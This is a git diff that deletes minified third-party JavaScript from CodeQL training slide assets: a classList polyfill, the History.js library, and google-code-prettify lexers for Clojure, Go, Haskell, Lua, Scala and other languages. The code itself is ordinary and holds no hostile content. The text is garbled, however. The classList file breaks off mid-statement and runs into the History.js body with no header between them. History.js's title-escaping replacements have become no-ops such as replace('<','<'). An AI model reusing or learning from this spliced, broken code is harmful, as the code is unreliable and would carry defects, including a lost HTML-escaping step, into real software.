b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/polyfills/classList.min.js deleted file mode 100644 index 932c77762129..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/polyfills/classList.min.js +++ /dev/null @@ -1,2 +0,0 @@ -/* @source http://purl.eligrey.com/github/classList.js/blob/master/classList.js*/ -"use strict";if(typeof document!=="undefined"&&!("classList" in document.createElement("a"))){(function(a){var f="classList",d="prototype",e=(a.HTMLElement||a.Element)[d],g=Object;strTrim=String[d].trim||function(){return this.replace(/^\s+|\s+$/g,"")},arrIndexOf=Array[d].indexOf||function(k){for(var j=0,h=this.length;j")&&c[0]);return a>4?a:!1}();return a},m.isInternetExplorer=function(){var a=m.isInternetExplorer.cached=typeof m.isInternetExplorer.cached!="undefined"?m.isInternetExplorer.cached:Boolean(m.getInternetExplorerMajorVersion());return a},m.emulated={pushState:!Boolean(a.history&&a.history.pushState&&a.history.replaceState&&!/ Mobile\/([1-7][a-z]|(8([abcde]|f(1[0-8]))))/i.test(e.userAgent)&&!/AppleWebKit\/5([0-2]|3[0-2])/i.test(e.userAgent)),hashChange:Boolean(!("onhashchange"in a||"onhashchange"in d)||m.isInternetExplorer()&&m.getInternetExplorerMajorVersion()<8)},m.enabled=!m.emulated.pushState,m.bugs={setHash:Boolean(!m.emulated.pushState&&e.vendor==="Apple Computer, Inc."&&/AppleWebKit\/5([0-2]|3[0-3])/.test(e.userAgent)),safariPoll:Boolean(!m.emulated.pushState&&e.vendor==="Apple Computer, Inc."&&/AppleWebKit\/5([0-2]|3[0-3])/.test(e.userAgent)),ieDoubleCheck:Boolean(m.isInternetExplorer()&&m.getInternetExplorerMajorVersion()<8),hashEscape:Boolean(m.isInternetExplorer()&&m.getInternetExplorerMajorVersion()<7)},m.isEmptyObject=function(a){for(var b in a)return!1;return!0},m.cloneObject=function(a){var b,c;return a?(b=k.stringify(a),c=k.parse(b)):c={},c},m.getRootUrl=function(){var a=d.location.protocol+"//"+(d.location.hostname||d.location.host);if(d.location.port||!1)a+=":"+d.location.port;return a+="/",a},m.getBaseHref=function(){var a=d.getElementsByTagName("base"),b=null,c="";return a.length===1&&(b=a[0],c=b.href.replace(/[^\/]+$/,"")),c=c.replace(/\/+$/,""),c&&(c+="/"),c},m.getBaseUrl=function(){var a=m.getBaseHref()||m.getBasePageUrl()||m.getRootUrl();return a},m.getPageUrl=function(){var a=m.getState(!1,!1),b=(a||{}).url||d.location.href,c;return c=b.replace(/\/+$/,"").replace(/[^\/]+$/,function(a,b,c){return/\./.test(a)?a:a+"/"}),c},m.getBasePageUrl=function(){var a=d.location.href.replace(/[#\?].*/,"").replace(/[^\/]+$/,function(a,b,c){return/[^\/]$/.test(a)?"":a}).replace(/\/+$/,"")+"/";return a},m.getFullUrl=function(a,b){var c=a,d=a.substring(0,1);return b=typeof b=="undefined"?!0:b,/[a-z]+\:\/\//.test(a)||(d==="/"?c=m.getRootUrl()+a.replace(/^\/+/,""):d==="#"?c=m.getPageUrl().replace(/#.*/,"")+a:d==="?"?c=m.getPageUrl().replace(/[\?#].*/,"")+a:b?c=m.getBaseUrl()+a.replace(/^(\.\/)+/,""):c=m.getBasePageUrl()+a.replace(/^(\.\/)+/,"")),c.replace(/\#$/,"")},m.getShortUrl=function(a){var b=a,c=m.getBaseUrl(),d=m.getRootUrl();return m.emulated.pushState&&(b=b.replace(c,"")),b=b.replace(d,"/"),m.isTraditionalAnchor(b)&&(b="./"+b),b=b.replace(/^(\.\/)+/g,"./").replace(/\#$/,""),b},m.store={},m.idToState=m.idToState||{},m.stateToId=m.stateToId||{},m.urlToId=m.urlToId||{},m.storedStates=m.storedStates||[],m.savedStates=m.savedStates||[],m.normalizeStore=function(){m.store.idToState=m.store.idToState||{},m.store.urlToId=m.store.urlToId||{},m.store.stateToId=m.store.stateToId||{}},m.getState=function(a,b){typeof a=="undefined"&&(a=!0),typeof b=="undefined"&&(b=!0);var c=m.getLastSavedState();return!c&&b&&(c=m.createStateObject()),a&&(c=m.cloneObject(c),c.url=c.cleanUrl||c.url),c},m.getIdByState=function(a){var b=m.extractId(a.url),c;if(!b){c=m.getStateString(a);if(typeof m.stateToId[c]!="undefined")b=m.stateToId[c];else if(typeof m.store.stateToId[c]!="undefined")b=m.store.stateToId[c];else{for(;;){b=(new Date).getTime()+String(Math.random()).replace(/\D/g,"");if(typeof m.idToState[b]=="undefined"&&typeof m.store.idToState[b]=="undefined")break}m.stateToId[c]=b,m.idToState[b]=a}}return b},m.normalizeState=function(a){var b,c;if(!a||typeof a!="object")a={};if(typeof a.normalized!="undefined")return a;if(!a.data||typeof a.data!="object")a.data={};b={},b.normalized=!0,b.title=a.title||"",b.url=m.getFullUrl(m.unescapeString(a.url||d.location.href)),b.hash=m.getShortUrl(b.url),b.data=m.cloneObject(a.data),b.id=m.getIdByState(b),b.cleanUrl=b.url.replace(/\??\&_suid.*/,""),b.url=b.cleanUrl,c=!m.isEmptyObject(b.data);if(b.title||c)b.hash=m.getShortUrl(b.url).replace(/\??\&_suid.*/,""),/\?/.test(b.hash)||(b.hash+="?"),b.hash+="&_suid="+b.id;return b.hashedUrl=m.getFullUrl(b.hash),(m.emulated.pushState||m.bugs.safariPoll)&&m.hasUrlDuplicate(b)&&(b.url=b.hashedUrl),b},m.createStateObject=function(a,b,c){var d={data:a,title:b,url:c};return d=m.normalizeState(d),d},m.getStateById=function(a){a=String(a);var c=m.idToState[a]||m.store.idToState[a]||b;return c},m.getStateString=function(a){var b,c,d;return b=m.normalizeState(a),c={data:b.data,title:a.title,url:a.url},d=k.stringify(c),d},m.getStateId=function(a){var b,c;return b=m.normalizeState(a),c=b.id,c},m.getHashByState=function(a){var b,c;return b=m.normalizeState(a),c=b.hash,c},m.extractId=function(a){var b,c,d;return c=/(.*)\&_suid=([0-9]+)$/.exec(a),d=c?c[1]||a:a,b=c?String(c[2]||""):"",b||!1},m.isTraditionalAnchor=function(a){var b=!/[\/\?\.]/.test(a);return b},m.extractState=function(a,b){var c=null,d,e;return b=b||!1,d=m.extractId(a),d&&(c=m.getStateById(d)),c||(e=m.getFullUrl(a),d=m.getIdByUrl(e)||!1,d&&(c=m.getStateById(d)),!c&&b&&!m.isTraditionalAnchor(a)&&(c=m.createStateObject(null,null,e))),c},m.getIdByUrl=function(a){var c=m.urlToId[a]||m.store.urlToId[a]||b;return c},m.getLastSavedState=function(){return m.savedStates[m.savedStates.length-1]||b},m.getLastStoredState=function(){return m.storedStates[m.storedStates.length-1]||b},m.hasUrlDuplicate=function(a){var b=!1,c;return c=m.extractState(a.url),b=c&&c.id!==a.id,b},m.storeState=function(a){return m.urlToId[a.url]=a.id,m.storedStates.push(m.cloneObject(a)),a},m.isLastSavedState=function(a){var b=!1,c,d,e;return m.savedStates.length&&(c=a.id,d=m.getLastSavedState(),e=d.id,b=c===e),b},m.saveState=function(a){return m.isLastSavedState(a)?!1:(m.savedStates.push(m.cloneObject(a)),!0)},m.getStateByIndex=function(a){var b=null;return typeof a=="undefined"?b=m.savedStates[m.savedStates.length-1]:a<0?b=m.savedStates[m.savedStates.length+a]:b=m.savedStates[a],b},m.getHash=function(){var a=m.unescapeHash(d.location.hash);return a},m.unescapeString=function(b){var c=b,d;for(;;){d=a.unescape(c);if(d===c)break;c=d}return c},m.unescapeHash=function(a){var b=m.normalizeHash(a);return b=m.unescapeString(b),b},m.normalizeHash=function(a){var b=a.replace(/[^#]*#/,"").replace(/#.*/,"");return b},m.setHash=function(a,b){var c,e,f;return b!==!1&&m.busy()?(m.pushQueue({scope:m,callback:m.setHash,args:arguments,queue:b}),!1):(c=m.escapeHash(a),m.busy(!0),e=m.extractState(a,!0),e&&!m.emulated.pushState?m.pushState(e.data,e.title,e.url,!1):d.location.hash!==c&&(m.bugs.setHash?(f=m.getPageUrl(),m.pushState(null,null,f+"#"+c,!1)):d.location.hash=c),m)},m.escapeHash=function(b){var c=m.normalizeHash(b);return c=a.escape(c),m.bugs.hashEscape||(c=c.replace(/\%21/g,"!").replace(/\%26/g,"&").replace(/\%3D/g,"=").replace(/\%3F/g,"?")),c},m.getHashByUrl=function(a){var b=String(a).replace(/([^#]*)#?([^#]*)#?(.*)/,"$2");return b=m.unescapeHash(b),b},m.setTitle=function(a){var b=a.title,c;b||(c=m.getStateByIndex(0),c&&c.url===a.url&&(b=c.title||m.options.initialTitle));try{d.getElementsByTagName("title")[0].innerHTML=b.replace("<","<").replace(">",">").replace(" & "," & ")}catch(e){}return d.title=b,m},m.queues=[],m.busy=function(a){typeof a!="undefined"?m.busy.flag=a:typeof m.busy.flag=="undefined"&&(m.busy.flag=!1);if(!m.busy.flag){h(m.busy.timeout);var b=function(){var a,c,d;if(m.busy.flag)return;for(a=m.queues.length-1;a>=0;--a){c=m.queues[a];if(c.length===0)continue;d=c.shift(),m.fireQueueItem(d),m.busy.timeout=g(b,m.options.busyDelay)}};m.busy.timeout=g(b,m.options.busyDelay)}return m.busy.flag},m.busy.flag=!1,m.fireQueueItem=function(a){return a.callback.apply(a.scope||m,a.args||[])},m.pushQueue=function(a){return m.queues[a.queue||0]=m.queues[a.queue||0]||[],m.queues[a.queue||0].push(a),m},m.queue=function(a,b){return typeof a=="function"&&(a={callback:a}),typeof b!="undefined"&&(a.queue=b),m.busy()?m.pushQueue(a):m.fireQueueItem(a),m},m.clearQueue=function(){return m.busy.flag=!1,m.queues=[],m},m.stateChanged=!1,m.doubleChecker=!1,m.doubleCheckComplete=function(){return m.stateChanged=!0,m.doubleCheckClear(),m},m.doubleCheckClear=function(){return m.doubleChecker&&(h(m.doubleChecker),m.doubleChecker=!1),m},m.doubleCheck=function(a){return m.stateChanged=!1,m.doubleCheckClear(),m.bugs.ieDoubleCheck&&(m.doubleChecker=g(function(){return m.doubleCheckClear(),m.stateChanged||a(),!0},m.options.doubleCheckInterval)),m},m.safariStatePoll=function(){var b=m.extractState(d.location.href),c;if(!m.isLastSavedState(b))c=b;else return;return c||(c=m.createStateObject()),m.Adapter.trigger(a,"popstate"),m},m.back=function(a){return a!==!1&&m.busy()?(m.pushQueue({scope:m,callback:m.back,args:arguments,queue:a}),!1):(m.busy(!0),m.doubleCheck(function(){m.back(!1)}),n.go(-1),!0)},m.forward=function(a){return a!==!1&&m.busy()?(m.pushQueue({scope:m,callback:m.forward,args:arguments,queue:a}),!1):(m.busy(!0),m.doubleCheck(function(){m.forward(!1)}),n.go(1),!0)},m.go=function(a,b){var c;if(a>0)for(c=1;c<=a;++c)m.forward(b);else{if(!(a<0))throw new Error("History.go: History.go requires a positive or negative integer passed.");for(c=-1;c>=a;--c)m.back(b)}return m};if(m.emulated.pushState){var o=function(){};m.pushState=m.pushState||o,m.replaceState=m.replaceState||o}else m.onPopState=function(b,c){var e=!1,f=!1,g,h;return m.doubleCheckComplete(),g=m.getHash(),g?(h=m.extractState(g||d.location.href,!0),h?m.replaceState(h.data,h.title,h.url,!1):(m.Adapter.trigger(a,"anchorchange"),m.busy(!1)),m.expectedStateId=!1,!1):(e=m.Adapter.extractEventData("state",b,c)||!1,e?f=m.getStateById(e):m.expectedStateId?f=m.getStateById(m.expectedStateId):f=m.extractState(d.location.href),f||(f=m.createStateObject(null,null,d.location.href)),m.expectedStateId=!1,m.isLastSavedState(f)?(m.busy(!1),!1):(m.storeState(f),m.saveState(f),m.setTitle(f),m.Adapter.trigger(a,"statechange"),m.busy(!1),!0))},m.Adapter.bind(a,"popstate",m.onPopState),m.pushState=function(b,c,d,e){if(m.getHashByUrl(d)&&m.emulated.pushState)throw new Error("History.js does not support states with fragement-identifiers (hashes/anchors).");if(e!==!1&&m.busy())return m.pushQueue({scope:m,callback:m.pushState,args:arguments,queue:e}),!1;m.busy(!0);var f=m.createStateObject(b,c,d);return m.isLastSavedState(f)?m.busy(!1):(m.storeState(f),m.expectedStateId=f.id,n.pushState(f.id,f.title,f.url),m.Adapter.trigger(a,"popstate")),!0},m.replaceState=function(b,c,d,e){if(m.getHashByUrl(d)&&m.emulated.pushState)throw new Error("History.js does not support states with fragement-identifiers (hashes/anchors).");if(e!==!1&&m.busy())return m.pushQueue({scope:m,callback:m.replaceState,args:arguments,queue:e}),!1;m.busy(!0);var f=m.createStateObject(b,c,d);return m.isLastSavedState(f)?m.busy(!1):(m.storeState(f),m.expectedStateId=f.id,n.replaceState(f.id,f.title,f.url),m.Adapter.trigger(a,"popstate")),!0};if(f){try{m.store=k.parse(f.getItem("History.store"))||{}}catch(p){m.store={}}m.normalizeStore()}else m.store={},m.normalizeStore();m.Adapter.bind(a,"beforeunload",m.clearAllIntervals),m.Adapter.bind(a,"unload",m.clearAllIntervals),m.saveState(m.storeState(m.extractState(d.location.href,!0))),f&&(m.onUnload=function(){var a,b;try{a=k.parse(f.getItem("History.store"))||{}}catch(c){a={}}a.idToState=a.idToState||{},a.urlToId=a.urlToId||{},a.stateToId=a.stateToId||{};for(b in m.idToState){if(!m.idToState.hasOwnProperty(b))continue;a.idToState[b]=m.idToState[b]}for(b in m.urlToId){if(!m.urlToId.hasOwnProperty(b))continue;a.urlToId[b]=m.urlToId[b]}for(b in m.stateToId){if(!m.stateToId.hasOwnProperty(b))continue;a.stateToId[b]=m.stateToId[b]}m.store=a,m.normalizeStore(),f.setItem("History.store",k.stringify(a))},m.intervalList.push(i(m.onUnload,m.options.storeInterval)),m.Adapter.bind(a,"beforeunload",m.onUnload),m.Adapter.bind(a,"unload",m.onUnload));if(!m.emulated.pushState){m.bugs.safariPoll&&m.intervalList.push(i(m.safariStatePoll,m.options.safariPollInterval));if(e.vendor==="Apple Computer, Inc."||(e.appCodeName||"")==="Mozilla")m.Adapter.bind(a,"hashchange",function(){m.Adapter.trigger(a,"popstate")}),m.getHash()&&m.Adapter.onDomLoad(function(){m.Adapter.trigger(a,"hashchange")})}},m.init()})(window) \ No newline at end of file diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-apollo.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-apollo.js deleted file mode 100644 index 7098baf41055..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-apollo.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["com",/^#[^\n\r]*/,null,"#"],["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["str",/^"(?:[^"\\]|\\[\S\s])*(?:"|$)/,null,'"']],[["kwd",/^(?:ADS|AD|AUG|BZF|BZMF|CAE|CAF|CA|CCS|COM|CS|DAS|DCA|DCOM|DCS|DDOUBL|DIM|DOUBLE|DTCB|DTCF|DV|DXCH|EDRUPT|EXTEND|INCR|INDEX|NDX|INHINT|LXCH|MASK|MSK|MP|MSU|NOOP|OVSK|QXCH|RAND|READ|RELINT|RESUME|RETURN|ROR|RXOR|SQUARE|SU|TCR|TCAA|OVSK|TCF|TC|TS|WAND|WOR|WRITE|XCH|XLQ|XXALQ|ZL|ZQ|ADD|ADZ|SUB|SUZ|MPY|MPR|MPZ|DVP|COM|ABS|CLA|CLZ|LDQ|STO|STQ|ALS|LLS|LRS|TRA|TSQ|TMI|TOV|AXT|TIX|DLY|INP|OUT)\s/, -null],["typ",/^(?:-?GENADR|=MINUS|2BCADR|VN|BOF|MM|-?2CADR|-?[1-6]DNADR|ADRES|BBCON|[ES]?BANK=?|BLOCK|BNKSUM|E?CADR|COUNT\*?|2?DEC\*?|-?DNCHAN|-?DNPTR|EQUALS|ERASE|MEMORY|2?OCT|REMADR|SETLOC|SUBRO|ORG|BSS|BES|SYN|EQU|DEFINE|END)\s/,null],["lit",/^'(?:-*(?:\w|\\[!-~])(?:[\w-]*|\\[!-~])[!=?]?)?/],["pln",/^-*(?:[!-z]|\\[!-~])(?:[\w-]*|\\[!-~])[!=?]?/],["pun",/^[^\w\t\n\r "'-);\\\xa0]+/]]),["apollo","agc","aea"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-clj.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-clj.js deleted file mode 100644 index 542a2205fc75..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-clj.js +++ /dev/null @@ -1,18 +0,0 @@ -/* - Copyright (C) 2011 Google Inc. - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -*/ -var a=null; -PR.registerLangHandler(PR.createSimpleLexer([["opn",/^[([{]+/,a,"([{"],["clo",/^[)\]}]+/,a,")]}"],["com",/^;[^\n\r]*/,a,";"],["pln",/^[\t\n\r \xa0]+/,a,"\t\n\r \xa0"],["str",/^"(?:[^"\\]|\\[\S\s])*(?:"|$)/,a,'"']],[["kwd",/^(?:def|if|do|let|quote|var|fn|loop|recur|throw|try|monitor-enter|monitor-exit|defmacro|defn|defn-|macroexpand|macroexpand-1|for|doseq|dosync|dotimes|and|or|when|not|assert|doto|proxy|defstruct|first|rest|cons|defprotocol|deftype|defrecord|reify|defmulti|defmethod|meta|with-meta|ns|in-ns|create-ns|import|intern|refer|alias|namespace|resolve|ref|deref|refset|new|set!|memfn|to-array|into-array|aset|gen-class|reduce|map|filter|find|nil?|empty?|hash-map|hash-set|vec|vector|seq|flatten|reverse|assoc|dissoc|list|list?|disj|get|union|difference|intersection|extend|extend-type|extend-protocol|prn)\b/,a], -["typ",/^:[\dA-Za-z-]+/]]),["clj"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-css.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-css.js deleted file mode 100644 index 041e1f590679..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-css.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\f\r ]+/,null," \t\r\n "]],[["str",/^"(?:[^\n\f\r"\\]|\\(?:\r\n?|\n|\f)|\\[\S\s])*"/,null],["str",/^'(?:[^\n\f\r'\\]|\\(?:\r\n?|\n|\f)|\\[\S\s])*'/,null],["lang-css-str",/^url\(([^"')]*)\)/i],["kwd",/^(?:url|rgb|!important|@import|@page|@media|@charset|inherit)(?=[^\w-]|$)/i,null],["lang-css-kw",/^(-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*)\s*:/i],["com",/^\/\*[^*]*\*+(?:[^*/][^*]*\*+)*\//],["com", -/^(?:<\!--|--\>)/],["lit",/^(?:\d+|\d*\.\d+)(?:%|[a-z]+)?/i],["lit",/^#[\da-f]{3,6}/i],["pln",/^-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*/i],["pun",/^[^\s\w"']+/]]),["css"]);PR.registerLangHandler(PR.createSimpleLexer([],[["kwd",/^-?(?:[_a-z]|\\[\da-f]+ ?)(?:[\w-]|\\\\[\da-f]+ ?)*/i]]),["css-kw"]);PR.registerLangHandler(PR.createSimpleLexer([],[["str",/^[^"')]+/]]),["css-str"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-go.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-go.js deleted file mode 100644 index fc18dc079671..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-go.js +++ /dev/null @@ -1 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["pln",/^(?:"(?:[^"\\]|\\[\S\s])*(?:"|$)|'(?:[^'\\]|\\[\S\s])+(?:'|$)|`[^`]*(?:`|$))/,null,"\"'"]],[["com",/^(?:\/\/[^\n\r]*|\/\*[\S\s]*?\*\/)/],["pln",/^(?:[^"'/`]|\/(?![*/]))+/]]),["go"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-hs.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-hs.js deleted file mode 100644 index 9d77b08389bd..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-hs.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t-\r ]+/,null,"\t\n \r "],["str",/^"(?:[^\n\f\r"\\]|\\[\S\s])*(?:"|$)/,null,'"'],["str",/^'(?:[^\n\f\r'\\]|\\[^&])'?/,null,"'"],["lit",/^(?:0o[0-7]+|0x[\da-f]+|\d+(?:\.\d+)?(?:e[+-]?\d+)?)/i,null,"0123456789"]],[["com",/^(?:--+[^\n\f\r]*|{-(?:[^-]|-+[^}-])*-})/],["kwd",/^(?:case|class|data|default|deriving|do|else|if|import|in|infix|infixl|infixr|instance|let|module|newtype|of|then|type|where|_)(?=[^\d'A-Za-z]|$)/, -null],["pln",/^(?:[A-Z][\w']*\.)*[A-Za-z][\w']*/],["pun",/^[^\d\t-\r "'A-Za-z]+/]]),["hs"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-lisp.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-lisp.js deleted file mode 100644 index 02a30e8d16e9..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-lisp.js +++ /dev/null @@ -1,3 +0,0 @@ -var a=null; -PR.registerLangHandler(PR.createSimpleLexer([["opn",/^\(+/,a,"("],["clo",/^\)+/,a,")"],["com",/^;[^\n\r]*/,a,";"],["pln",/^[\t\n\r \xa0]+/,a,"\t\n\r \xa0"],["str",/^"(?:[^"\\]|\\[\S\s])*(?:"|$)/,a,'"']],[["kwd",/^(?:block|c[ad]+r|catch|con[ds]|def(?:ine|un)|do|eq|eql|equal|equalp|eval-when|flet|format|go|if|labels|lambda|let|load-time-value|locally|macrolet|multiple-value-call|nil|progn|progv|quote|require|return-from|setq|symbol-macrolet|t|tagbody|the|throw|unwind)\b/,a], -["lit",/^[+-]?(?:[#0]x[\da-f]+|\d+\/\d+|(?:\.\d+|\d+(?:\.\d*)?)(?:[de][+-]?\d+)?)/i],["lit",/^'(?:-*(?:\w|\\[!-~])(?:[\w-]*|\\[!-~])[!=?]?)?/],["pln",/^-*(?:[_a-z]|\\[!-~])(?:[\w-]*|\\[!-~])[!=?]?/i],["pun",/^[^\w\t\n\r "'-);\\\xa0]+/]]),["cl","el","lisp","scm"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-lua.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-lua.js deleted file mode 100644 index e83a3c469319..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-lua.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["str",/^(?:"(?:[^"\\]|\\[\S\s])*(?:"|$)|'(?:[^'\\]|\\[\S\s])*(?:'|$))/,null,"\"'"]],[["com",/^--(?:\[(=*)\[[\S\s]*?(?:]\1]|$)|[^\n\r]*)/],["str",/^\[(=*)\[[\S\s]*?(?:]\1]|$)/],["kwd",/^(?:and|break|do|else|elseif|end|false|for|function|if|in|local|nil|not|or|repeat|return|then|true|until|while)\b/,null],["lit",/^[+-]?(?:0x[\da-f]+|(?:\.\d+|\d+(?:\.\d*)?)(?:e[+-]?\d+)?)/i], -["pln",/^[_a-z]\w*/i],["pun",/^[^\w\t\n\r \xa0][^\w\t\n\r "'+=\xa0-]*/]]),["lua"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-ml.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-ml.js deleted file mode 100644 index 6df02d728d16..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-ml.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["com",/^#(?:if[\t\n\r \xa0]+(?:[$_a-z][\w']*|``[^\t\n\r`]*(?:``|$))|else|endif|light)/i,null,"#"],["str",/^(?:"(?:[^"\\]|\\[\S\s])*(?:"|$)|'(?:[^'\\]|\\[\S\s])(?:'|$))/,null,"\"'"]],[["com",/^(?:\/\/[^\n\r]*|\(\*[\S\s]*?\*\))/],["kwd",/^(?:abstract|and|as|assert|begin|class|default|delegate|do|done|downcast|downto|elif|else|end|exception|extern|false|finally|for|fun|function|if|in|inherit|inline|interface|internal|lazy|let|match|member|module|mutable|namespace|new|null|of|open|or|override|private|public|rec|return|static|struct|then|to|true|try|type|upcast|use|val|void|when|while|with|yield|asr|land|lor|lsl|lsr|lxor|mod|sig|atomic|break|checked|component|const|constraint|constructor|continue|eager|event|external|fixed|functor|global|include|method|mixin|object|parallel|process|protected|pure|sealed|trait|virtual|volatile)\b/], -["lit",/^[+-]?(?:0x[\da-f]+|(?:\.\d+|\d+(?:\.\d*)?)(?:e[+-]?\d+)?)/i],["pln",/^(?:[_a-z][\w']*[!#?]?|``[^\t\n\r`]*(?:``|$))/i],["pun",/^[^\w\t\n\r "'\xa0]+/]]),["fs","ml"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-n.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-n.js deleted file mode 100644 index 6c2e85b98f50..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-n.js +++ /dev/null @@ -1,4 +0,0 @@ -var a=null; -PR.registerLangHandler(PR.createSimpleLexer([["str",/^(?:'(?:[^\n\r'\\]|\\.)*'|"(?:[^\n\r"\\]|\\.)*(?:"|$))/,a,'"'],["com",/^#(?:(?:define|elif|else|endif|error|ifdef|include|ifndef|line|pragma|undef|warning)\b|[^\n\r]*)/,a,"#"],["pln",/^\s+/,a," \r\n\t\xa0"]],[["str",/^@"(?:[^"]|"")*(?:"|$)/,a],["str",/^<#[^#>]*(?:#>|$)/,a],["str",/^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h|[a-z]\w*)>/,a],["com",/^\/\/[^\n\r]*/,a],["com",/^\/\*[\S\s]*?(?:\*\/|$)/, -a],["kwd",/^(?:abstract|and|as|base|catch|class|def|delegate|enum|event|extern|false|finally|fun|implements|interface|internal|is|macro|match|matches|module|mutable|namespace|new|null|out|override|params|partial|private|protected|public|ref|sealed|static|struct|syntax|this|throw|true|try|type|typeof|using|variant|virtual|volatile|when|where|with|assert|assert2|async|break|checked|continue|do|else|ensures|for|foreach|if|late|lock|new|nolate|otherwise|regexp|repeat|requires|return|surroundwith|unchecked|unless|using|while|yield)\b/, -a],["typ",/^(?:array|bool|byte|char|decimal|double|float|int|list|long|object|sbyte|short|string|ulong|uint|ufloat|ulong|ushort|void)\b/,a],["lit",/^@[$_a-z][\w$@]*/i,a],["typ",/^@[A-Z]+[a-z][\w$@]*/,a],["pln",/^'?[$_a-z][\w$@]*/i,a],["lit",/^(?:0x[\da-f]+|(?:\d(?:_\d+)*\d*(?:\.\d*)?|\.\d\+)(?:e[+-]?\d+)?)[a-z]*/i,a,"0123456789"],["pun",/^.[^\s\w"-$'./@`]*/,a]]),["n","nemerle"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-proto.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-proto.js deleted file mode 100644 index f006ad8cfb6c..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-proto.js +++ /dev/null @@ -1 +0,0 @@ -PR.registerLangHandler(PR.sourceDecorator({keywords:"bytes,default,double,enum,extend,extensions,false,group,import,max,message,option,optional,package,repeated,required,returns,rpc,service,syntax,to,true",types:/^(bool|(double|s?fixed|[su]?int)(32|64)|float|string)\b/,cStyleComments:!0}),["proto"]); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-scala.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-scala.js deleted file mode 100644 index 60d034de4954..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/prettify/lang-scala.js +++ /dev/null @@ -1,2 +0,0 @@ -PR.registerLangHandler(PR.createSimpleLexer([["pln",/^[\t\n\r \xa0]+/,null,"\t\n\r Â\xa0"],["str",/^"(?:""(?:""?(?!")|[^"\\]|\\.)*"{0,3}|(?:[^\n\r"\\]|\\.)*"?)/,null,'"'],["lit",/^`(?:[^\n\r\\`]|\\.)*`?/,null,"`"],["pun",/^[!#%&(--:-@[-^{-~]+/,null,"!#%&()*+,-:;<=>?@[\\]^{|}~"]],[["str",/^'(?:[^\n\r'\\]|\\(?:'|[^\n\r']+))'/],["lit",/^'[$A-Z_a-z][\w$]*(?![\w$'])/],["kwd",/^(?:abstract|case|catch|class|def|do|else|extends|final|finally|for|forSome|if|implicit|import|lazy|match|new|object|override|package|private|protected|requires|return|sealed|super|throw|trait|try|type|val|var|while|with|yield)\b/], 